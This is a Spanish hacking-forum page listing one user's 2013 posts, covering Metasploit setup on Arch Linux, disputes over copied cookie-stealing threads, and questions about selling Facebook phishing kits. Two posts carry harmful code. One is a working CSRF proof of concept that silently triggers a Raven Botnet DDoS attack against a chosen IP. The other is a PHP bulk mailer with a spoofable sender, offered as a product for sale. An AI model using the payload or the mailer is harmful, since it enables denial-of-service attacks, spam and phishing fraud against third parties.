Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Metadato

#1
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Bien Jimeno al ejecutar gem install pcaprub -v '0.11.3' me arroja lo siguiente:



Saludos

Si usas ArchLinux y no sabes resolver dependencias, vas a tener muchos problemas.

Ahí te lo dice, falta la libreria pcap.h y en la página de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta de pcaprub te dicen que uno de los requerimientos es tener instalado libpcap

Instala libpcap e intenta de nuevo y avisa si tienes algún otro problema.

Saludos!

Muchísimas gracias todo solucionado! La verdad es que me he instalado hoy mismo Arch Linux y voy bastante perdido perdón por las molestias causadas, intentaré fijarme mejor para la proxima vez y una última cosa, ¿si conocen algún blog o página web en español donde pueda ir avanzando mis conocimientos básicos sobre arch (como por ejemplo este fallo tan tonto como una dependencia)?

De nuevo muchas gracias y saludos 11Sep
#2
Bien Jimeno al ejecutar gem install pcaprub -v '0.11.3' me arroja lo siguiente:



Saludos
#3
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Bueno he seguido los pasos del tutorial al pie de la letra y al ejecutar el "bundle install" me aparece este error:



Y al ejecutar ./msfconsole -L me sigue diciendo que tengo que ejecutar "bundle install"

Saludos

Asegúrate de haber instalado la gema de ruby.
sudo gem install pcaprub -v '0.11.3'

Sí tambien he probado eso pero nada, grácias
Saludos
#4
Bueno he seguido los pasos del tutorial al pie de la letra y al ejecutar el "bundle install" me aparece este error:



Y al ejecutar ./msfconsole -L me sigue diciendo que tengo que ejecutar "bundle install"
Tambien he probado a usar lo que me dice en rojo y he ejecutado el "gem install pcaprub -v '0.11.3'" Y nada.
Saludos
#5
La verdad es que no ANTRAX me informé un poco mas sobre el metodo que proporcionó el usuario Snifer pero no logró instalar metasploit correctamente  :-\

Saludos!
#6
Buenas a todos, quería preguntar si es posible instalar Metasploit en Archlinux sin tener el modo gráfico instalado.
He estado buscando pero no he tenido éxito con este problema. Agradecería que alguien me pudiera explicar como instalar Metasploit en Archlinux sin utilizar el instalador gráfico (de Metasploit) en Archlinux.

Un saludo. ;D
#7
Bugs y Exploits / Re:CSRF Raven Botnet
Agosto 29, 2013, 11:12:07 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muy buen csrf, y el detalle de reportarlo muchisimo mejor.

Saludos!

Gracias Pekador, un saludo compa.
#8
Bugs y Exploits / CSRF Raven Botnet
Agosto 28, 2013, 01:55:33 PM
Bueno pues hola a todos, he encontrado varios CSRF en la Raven Botnet, uno de ellos está en la parte del ataque:

Código: html5

<html>

<!-- CSRF Raven botnet, by Metadato -->

<body onload="document.csrf.submit();">
<form name="csrf" action="URL DONDE SE ENCUENTRA LA BOTNET/admin.php" method="post">
<input type="hidden" name="target" value="HOST / IP QUE QUEREMOS ATACAR">
<input type="hidden" name="time" value="TIEMPO EN SEGUNDOS">
<input type="hidden" name="start" value="Attack!">
</form>
</body>
</html>


Tendrían que editar todo lo que está en mayúscula, les mostraré el mismo código con un ejemplo:

Código: html5

<html>

<!-- CSRF Raven botnet, by Metadato -->

<body onload="document.csrf.submit();">
<form name="csrf" action="http://ravenbotnet.com/admin.php" method="post">
<input type="hidden" name="target" value="173.194.34.248">
<input type="hidden" name="time" value="500">
<input type="hidden" name="start" value="Attack!">
</form>
</body>
</html>


Tambien podrían ocultar este script con un pequeño fake, pero como la intención de este post es que se fixeen los CSRF's, no se lo mostraré.
Bueno tambien voy a ser sincero, ¿cuantos de ustedes muestran la url donde esta su Raven Botnet? Creo que ninguno, quien lo haga no es muy recomendable, y más en este caso.

Bueno si quieren solucionar esto de forma rápida (aunque algo chapucera), puede cambiar el nombre de admin.php por otro nombre y en el index.php, en la línea 10:

Código: php

echo '<META HTTP-EQUIV="Refresh" CONTENT="0; URL=admin.php">';


Le cambian el admin.php por el nombre que le pusieron y listo, también pueden montar la Raven de forma local. Espero que [Q]3rV[0] atienda este mensaje.

Un saludo  ;D
#9
Bugs y Exploits / Re:Robar cookies
Agosto 24, 2013, 10:49:50 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Estamos ante una plaga de kiddies de HS, please, no más usuarios de un foro en el que se dedican a tirar havij contra holos de habbo.
Sanko, que me diga esto un chaval de estos, todavía lo puedo entender.
¿Pero tú?, eso ya no tío, mira entiendo que no te guste que vengan estos individuos y hagan aportes un tanto extraños, pero no debes culpar a una comunidad por un usuario, aparte creo que tienen derecho a aprender (unos más que otros), no creo que nadie haya nacido aprendido.
Y bueno HoloScripter, es una comunidad dedicada al scripting, no al hacking y murió cuando inmortal y cornamenta dejaron de desarrollar las packetlogger con funciones de inyección de paquetes el en los emuladores de los "habbo holos", y seguro que muchos de aquí no tienen los suficientes conocimientos de criptografía que algunos usuarios de HoloScripter.
Dejando de lado el comentario, aver cuando hablamos colega, un saludo y un abrazo :) Sankete!!!

Totalmente de acuerdo, un saludo compa.
#10
Bugs y Exploits / Re:Robar cookies de cualquier xat
Agosto 24, 2013, 06:22:41 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Por favor, podrías poner los créditos al usuario que escribió esto y de donde los sacaste.

Saludos.  ;)

Créditos: ndk

Fuente: Mi cerebro

Saludos ;)

No es cierto, eso que has copiado y pegado es una respuesta del usuario de Holoscripter: iDarkHS,

Deja de rippear.
#11
Bugs y Exploits / Re:[TUTORIAL] Como crear tu csrf
Agosto 24, 2013, 06:14:27 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Autor del Post: IrareHS
Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Deja ya de copiar temas del foro, estas llenandolo haciendo copy & paste, y sin poner creditós, que falta de verguenza.

Tienes mucha razón yo ya le advertí en otro tema, y sigue igual.

Un saludo.
#12
Bugs y Exploits / Re:Robar cookies de cualquier xat
Agosto 23, 2013, 07:21:25 PM
Por favor, podrías poner los créditos al usuario que escribió esto y de donde los sacaste.

Saludos.  ;)
#13
QUE GRANDE!! Muchas gracias por el aporte!!

Un saludo.
#14
Solucionado, me lo mandaba a la carpeta de correo no deseado por un enlace que lo detecta como spam.

Un saludo.
#15
Pues bueno cuando ejecuto este script me manda los mails a la carpeta de spam, si ustedes me pueden decir en que fallo para que no lo envíe a esa carpeta, aquí les dejo el code, creo que el problema está en las cabeceras por que he probado este mismo script, pero con texto plano y no lo envía a la carpeta de spam, (obviamente retiro las cabeceras de MIME).

Code:

Código: php

<?php

/*

===============================
==  PHP Mailer, by Metadato  ==
===============================

*/

$from_name = $_POST['from_name'];
$from_email = $_POST['from_email'];
$to = $_POST['to'];
$subject = $_POST['subject'];
$message = $_POST['message'];
$cantidad = $_POST['cantidad'];

$headers  = 'MIME-Version: 1.0'."\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1'."\r\n";
$headers .= "From: $from_name < $from_email >";

for($emails = 0; $emails < $cantidad; $emails++) {
mail($to, $subject, $message, $headers);
}
?>


Un  saludo.
#16
Vale gracias a todos por la info, saludos.
#17
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
me pregunto a quien le podrías vender un mailer o scam en php XD

Hasta que no este seguro de que es legal, a nadie.

Saludos  :P
#18
¡Muchas gracias por su asesoramiento! Bueno veo que no me estaría guiando por buen camino, pero, ¿en teoría si podría vender un mailer? Un producto que envía un mail a través de un script en PHP (con la capacidad de modificar el FROM, ej: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) no sería ilegal en cierto modo. Si el cliente le da un uso fraudulento ya es problema suyo.

¿Estoy en lo cierto?

Un saludo, gracias por leer.
#19
Hola a todos, me ha surgido una duda, si yo por ejemplo hago un scam de Facebook, un mailer con un letter de esta red social, y vendo todo eso por una suma de dinero a una persona, y luego a esa persona la denuncian, ¿yo estaría metido tambien por vender estos productos, o vender estos es ilegal?

Saludos.
#20
Dudas y pedidos generales / Re:BOTNET RAVEN ERROR!
Julio 17, 2013, 10:58:27 AM
FAIL.

Desde luego que eso que has hecho esta muy mal.